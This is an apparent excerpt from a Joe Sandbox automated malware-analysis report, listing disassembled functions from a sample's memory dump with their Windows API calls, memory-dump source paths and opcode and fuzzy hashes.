                                                                                                                                                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00A839F0
                                                                                                                                                                                                                                                                                                    • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00A83A05
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Temp$FileNamePath
                                                                                                                                                                                                                                                                                                    • String ID: aut
                                                                                                                                                                                                                                                                                                    • API String ID: 3285503233-3010740371
                                                                                                                                                                                                                                                                                                    • Opcode ID: ba81e9022f30cf7634a97809d0b48be8c64c5131506b5733ad6356ff14111e78
                                                                                                                                                                                                                                                                                                    • Instruction ID: 9a08fdc25f84154fc7e1d98ae7b7b72de2e6ff83fdd08f5540d8055def188f0b
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba81e9022f30cf7634a97809d0b48be8c64c5131506b5733ad6356ff14111e78
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03D05BB150031577DA20D794DC0DFCB7E6CDB45750F0005917A96910D1DBB0D649C790
                                                                                                                                                                                                                                                                                                    Function 00AA2DBE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00AA2DC8
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00AA2DDB
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7F292: Sleep.KERNEL32 ref: 00A7F30A
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                                    • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                                                    • Opcode ID: fcc4ea2bd2eed703eb904f64b4a004f569ae12afa19f37c261182555753c9671
                                                                                                                                                                                                                                                                                                    • Instruction ID: 1fe574cc5fe68aecfb34166822dfa8ea1e9925f11be9b2cc4454082cfebd5a7d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fcc4ea2bd2eed703eb904f64b4a004f569ae12afa19f37c261182555753c9671
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2BD0A935394302BAE228E3B0AC0BFD63A10AB00B00F108821B28AAA1C0CAA068018680
                                                                                                                                                                                                                                                                                                    Function 00AA2DF2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00AA2E08
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000), ref: 00AA2E0F
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7F292: Sleep.KERNEL32 ref: 00A7F30A
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                                    • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                                                    • Opcode ID: 3ed399f9e79c5bfa5ce44fa4da003e53a42d81b645032765a4d0d757ebc614ac
                                                                                                                                                                                                                                                                                                    • Instruction ID: d51dc38f33f7f38484866bee370a95a43ac4169b6e033c36f3751e079e444ff5
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ed399f9e79c5bfa5ce44fa4da003e53a42d81b645032765a4d0d757ebc614ac
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0D0A9313813027AE228E3B0AC0BFC63A10AB01B00F108821B28AAA1C0CAA068018684
                                                                                                                                                                                                                                                                                                    Function 00A4C17D Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00A4C213
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00A4C221
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00A4C27C
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1717984340-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 542da4b08dd8a4978ae0ae8507e80985b0384688ae11b01f85b03546bf885e22
                                                                                                                                                                                                                                                                                                    • Instruction ID: 62efb7dfcbcb8478cbde70a314bcae40b0d835afe5367f2ff114a23cfb03a5e2
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 542da4b08dd8a4978ae0ae8507e80985b0384688ae11b01f85b03546bf885e22
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D941B738605206AFDB61AFE5C844BFA7BA5AF91730F244169F85D9B1A1EBF08D01C760